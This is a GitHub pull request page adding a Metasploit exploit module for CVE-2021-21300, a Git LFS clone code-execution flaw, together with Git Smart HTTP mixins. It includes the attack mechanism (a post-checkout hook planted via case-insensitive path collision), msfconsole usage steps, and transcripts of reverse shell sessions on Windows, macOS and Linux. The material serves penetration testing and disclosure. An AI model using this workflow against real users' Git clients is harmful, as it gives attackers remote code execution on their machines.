Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for CVE-2021-21300 and Git mixins #15532

Merged
merged 18 commits into from
Aug 26, 2021
Merged

Add module for CVE-2021-21300 and Git mixins #15532

merged 18 commits into from
Aug 26, 2021

Conversation

space-r7
Copy link
Contributor

@space-r7 space-r7 commented Aug 9, 2021
edited by timwr
Loading

Description

This adds an exploit module for CVE-2021-21300 and a set of mixins that aid in exploiting Git clients over the Smart HTTP protocol. This also updates older Git-related exploits to use some of the new code.

Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems are
vulnerable to remote code execution while cloning a repository.

Usage of clean / smudge filters through Git LFS and a case-insensitive file system changes the checkout order
of repository files which enables the placement of a Git hook in the .git/hooks directory. By default, this module writes
a post-checkout script so that the payload will automatically be executed upon checkout of the repository.

Verification

  • Install a vulnerable Git and Git LFS client (instructions in docs)
  • Start msfconsole
  • Do: use exploit/multi/http/git_lfs_clone_command_exec
  • Do: run
  • On the target do: git clone <git_repo>
  • You should get a shell.

Scenarios

CVE-2021-21300

Git 2.30.1 for Windows

msf6 > use exploit/multi/http/git_lfs_clone_command_exec 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set srvhost 192.168.140.1
srvhost => 192.168.140.1
msf6 exploit(multi/http/git_lfs_clone_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.140.1:4444 
msf6 exploit(multi/http/git_lfs_clone_command_exec) > [*] Using URL: http://192.168.140.1:8080/PRcDc6VIFG
[*] Server started.
[*] Git repository to clone: http://192.168.140.1:8080/solarbreeze.git
[*] Sending payload data...
[*] Sending LFS object...
[+] Deleted .gitattributes
[+] Deleted okloyzhacjw
[+] Deleted .git
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.132:50009) at 2021-08-09 12:19:35 -0500

msf6 exploit(multi/http/git_lfs_clone_command_exec) > sessions -i -1
[*] Starting interaction with 1...

whoami
Shelby Pace
uname -a
MINGW64_NT-10.0-14393 DESKTOP-66PT795 3.1.7-340.x86_64 2020-10-23 13:08 UTC x86_64 Msys

Git 2.20.1 for MacOS

msf6 > use exploit/multi/http/git_lfs_clone_command_exec 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set srvhost 192.168.140.1
srvhost => 192.168.140.1
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/git_lfs_clone_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.140.1:4444 
msf6 exploit(multi/http/git_lfs_clone_command_exec) >
[*] Using URL: http://192.168.140.1:8080/epWdIcZgUp94
[*] Server started.
[*] Git repository to clone: http://192.168.140.1:8080/konklux.git
[*] Sending payload data...
[*] Sending LFS object...
[+] Deleted .gitattributes
[+] Deleted jqeymnnhoce
[+] Deleted .git
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.131:49401) at 2021-08-09 15:20:22 -0500

msf6 exploit(multi/http/git_lfs_clone_command_exec) > sessions -i -1
[*] Starting interaction with 1...

whoami
space
uname -a
Darwin spaces-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Tue Aug 20 16:57:14 PDT 2019; root:xnu-4903.271.2~2/RELEASE_X86_64 x86_64

Updated Modules

  • modules/exploits/multi/http/git_client_command_exec.rb -> 2.2.0
msf6 > use exploit/multi/http/git_client_command_exec
msf6 exploit(multi/http/git_client_command_exec) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf6 exploit(multi/http/git_client_command_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/git_client_command_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/git_client_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/git_client_command_exec) > 
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Using URL: http://192.168.37.1:8080/gJnoE43VE1
[*] Server started.
[*] Malicious Git URI is http://192.168.37.1:8080/rtfy.git
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.144:49255) at 2021-07-14 16:45:54 -0500

msf6 exploit(multi/http/git_client_command_exec) > sessions -i -1
[*] Starting interaction with 1...

uname -a
MINGW32_NT-6.1 WIN-SDFTIF89MIT 1.0.12(0.46/3/2) 2012-07-05 14:56 i686 unknown
  • modules/exploits/multi/http/git_submodule_command_exec.rb -> 2.7.5
msf6 > use exploit/multi/http/git_submodule_command_exec 
[*] Using configured payload cmd/unix/reverse_python
msf6 exploit(multi/http/git_submodule_command_exec) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf6 exploit(multi/http/git_submodule_command_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/git_submodule_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/git_submodule_command_exec) > 
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Using URL: http://192.168.37.1:8080/dAzYrZl005vEI
[*] Server started.
[*] Malicious Git URI is http://192.168.37.1:8080/kujfxjoub.git
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:59662) at 2021-07-14 15:03:36 -0500

msf6 exploit(multi/http/git_submodule_command_exec) > sessions -i -1
[*] Starting interaction with 1...

uname -a
Linux ubuntu 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
space
  • modules/exploits/multi/http/git_submodule_url_exec.rb -> 2.19.0
msf6 exploit(multi/http/git_submodule_url_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/git_submodule_url_exec) > 
[*] Started reverse TCP handler on 192.168.37.75:4444 
[*] Using URL: http://192.168.37.75:8080/5LUNukwTqTJ7sed
[*] Server started.
[*] Malicious Git URI is http://192.168.37.75:8080/xgyuj.git
[*] git clone --recurse-submodules http://192.168.37.75:8080/xgyuj.git
Interrupt: use the 'exit' command to quit
msf6 exploit(multi/http/git_submodule_url_exec) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf6 exploit(multi/http/git_submodule_url_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/git_submodule_url_exec) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.37.1:4444 
msf6 exploit(multi/http/git_submodule_url_exec) >
[*] Using URL: http://192.168.37.1:8080/mJBVOrk8nCFaptG
[*] Server started.
[*] Malicious Git URI is http://192.168.37.1:8080/aymxub.git
[*] git clone --recurse-submodules http://192.168.37.1:8080/aymxub.git
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.1:57423) at 2021-07-14 14:29:34 -0500

msf6 exploit(multi/http/git_submodule_url_exec) > sessions -i -1
[*] Starting interaction with 2...

uname -a
Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
space

@gwillcox-r7 gwillcox-r7 self-assigned this Aug 9, 2021
@gwillcox-r7
Copy link
Contributor

@msjenkins-r7 test this please

@wvu
Copy link
Contributor

wvu commented Aug 10, 2021

Really nice work, @space-r7!

@wvu wvu added the library label Aug 10, 2021
@gwillcox-r7 gwillcox-r7 removed their assignment Aug 11, 2021
@space-r7
add wrapper methods for creating git objects
3fb225c 
use methods in git_submodule_command_exec
@space-r7
add git mixin changes and usage in git exploits
d89554e
@space-r7
add packfile, pkt line, and module code
d7161d0
@space-r7
add parent param to git mixin
73ad7de 
add fixes to packfile mixin
@space-r7
add module
5318764 
also includes packfile obj metadata changes
@space-r7
add git lfs and smart http changes
98ef499
@space-r7
modify options and add documentation
0fe761b
@space-r7
remove namespace
a4cc954
@space-r7
update comments, remove debugging statements
2736599
@space-r7
add request / response classes
d0c0372
@space-r7
account for ofs-delta / ref-delta objects
51741c8
@space-r7
remove pry statements
89e6690
@space-r7
add find_obj method and delta object parsing
e2f1ad6
@space-r7
fix packfile construction, fix git push
03e9d82 
also adds the ability to further customize
commits, including the option to use a custom
email address, name, commit message, etc.
@space-r7
change modules to use hash in build_commit_object
70f304a
@space-r7
add comments and test
0530f78
@space-r7
add notes to updated modules
31cbcb7
@space-r7
remove GIT_HOOK option
c9bdd96 
post-checkout is the only hook that will work
with this exploit, so no option is needed. Also update
the documentation to reflect that.
@timwr timwr self-assigned this Aug 18, 2021
@timwr
Copy link
Contributor

timwr commented Aug 25, 2021

This is working for me on macOS:

user@Catalina-10154 gittest % git --version
git version 2.24.3 (Apple Git-128)
user@Catalina-10154 gittest % git clone http://192.168.13.37:8080/latlux.git
Cloning into 'latlux'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), done.
warning: the following paths have collided (e.g. case-sensitive paths
on a case-insensitive filesystem) and only one from the same
colliding group is in the working tree:

  'cxiwzjzrlo'
  'CXIWZJZRLO/post-checkout'
/Users/user/gittest/latlux/.git/hooks/post-checkout: line 2: 95: Bad file descriptor
(...session 1 opened)
^Cwarning: Clone succeeded, but checkout failed.
You can inspect what was checked out with 'git status'
and retry with 'git restore --source=HEAD :/'



Exiting because of "interrupt" signal.
user@Catalina-10154 gittest %

but I can't seem to get it to work on Windows 10 (https://github.com/git-for-windows/git/releases/tag/v2.29.0.windows.1):

User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ export MSYS=winsymlinks:nativestrict

User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ git clone http://192.168.13.37:8080/latlux.git
Cloning into 'latlux'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), 705 bytes | 13.00 KiB/s, done.
error: unable to create file CXIWZJZRLO/post-checkout: No such file or directory
warning: the following paths have collided (e.g. case-sensitive paths
on a case-insensitive filesystem) and only one from the same
colliding group is in the working tree:

  'cxiwzjzrlo'
fatal: unable to checkout working tree
warning: Clone succeeded, but checkout failed.
You can inspect what was checked out with 'git status'
and retry with 'git restore --source=HEAD :/'


User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ git --version
git version 2.29.0.windows.1

User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ cat latlux/
.git/           .gitattributes  cxiwzjzrlo

User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ cat latlux/cxiwzjzrlo
.git/hooks

I installed ensured git lfs and symbolic links were enabled during installation. Any ideas?

@space-r7
Copy link
Contributor Author

but I can't seem to get it to work on Windows 10 (https://github.com/git-for-windows/git/releases/tag/v2.29.0.windows.1):

I installed ensured git lfs and symbolic links were enabled during installation. Any ideas?

Are you running Git Bash as an administrator? Symbolic links on Windows require the SeCreateSymbolicLinkPrivilege privilege as well, so you can either enable that for the user account or run Git Bash as an administrator.

@timwr
Copy link
Contributor

timwr commented Aug 26, 2021

Ah that was it, thanks!
The code looks great so I'll go ahead and land this once I've validated the older modules shortly.
Nice work!

@space-r7
Copy link
Contributor Author

Thanks so much!

@timwr
Copy link
Contributor

timwr commented Aug 26, 2021

Confirmed exploit/multi/http/git_lfs_clone_command_exec against:

  • git version 2.24.3 (Apple Git-128) on macOS
  • git version 2.29.0.windows.1 on Windows 10

Confirmed exploit/multi/http/git_submodule_command_exec with:

  • git version 2.7.1 on macOS

Confirmed exploit/multi/http/git_submodule_url_exec with:

  • git version 2.19.0 on macOS

@timwr timwr merged commit 6c0b90e into rapid7:master Aug 26, 2021
@timwr
Copy link
Contributor

timwr commented Aug 26, 2021

git version 2.29.0.windows.1 on Windows 10:

msf6 > use exploit/multi/http/git_lfs_clone_command_exec
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf6 exploit(multi/http/git_lfs_clone_command_exec) > rexploit
[*] Reloading module...
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/git_lfs_clone_command_exec) >
[*] Started reverse TCP handler on 192.168.13.37:4444
[*] Using URL: http://0.0.0.0:8080/Fh2J2uA4cPX
[*] Local IP: http://192.168.13.37:8080/Fh2J2uA4cPX
[*] Server started.
[*] Git repository to clone: http://192.168.13.37:8080/sonair.git


Jobs
====

  Id  Name                                            Payload                Payload opts
  --  ----                                            -------                ------------
  0   Exploit: multi/http/git_lfs_clone_command_exec  cmd/unix/reverse_bash  tcp://192.168.13.37:4444

msf6 exploit(multi/http/git_lfs_clone_command_exec) >
[*] Sending payload data...
[*] Sending LFS object...
[+] Deleted .gitattributes
[+] Deleted ezlocylph
[+] Deleted .git
[*] Command shell session 1 opened (192.168.13.37:4444 -> 192.168.13.37:43798) at 2021-08-26 18:27:03 +0100

msf6 exploit(multi/http/git_lfs_clone_command_exec) > sessions 1
[*] Starting interaction with 1...

pwd
/c/Users/User/test/sonair
id
uid=197609(User) gid=197121 groups=197121
uname
MINGW64_NT-10.0-19042

@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 26, 2021
@gwillcox-r7
Copy link
Contributor

Release Notes

An exploit module for CVE-2021-21300, a RCE vulnerability in affected Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems. Additionally aset of mixins that aid in exploiting Git clients over the Smart HTTP protocol have been added into Metasploit and the code for older Git-related exploits has been updated to utilize some of this new code.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

Assignees

@timwr timwr

Labels
docs library module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@space-r7 @gwillcox-r7 @wvu @timwr @bwatters-r7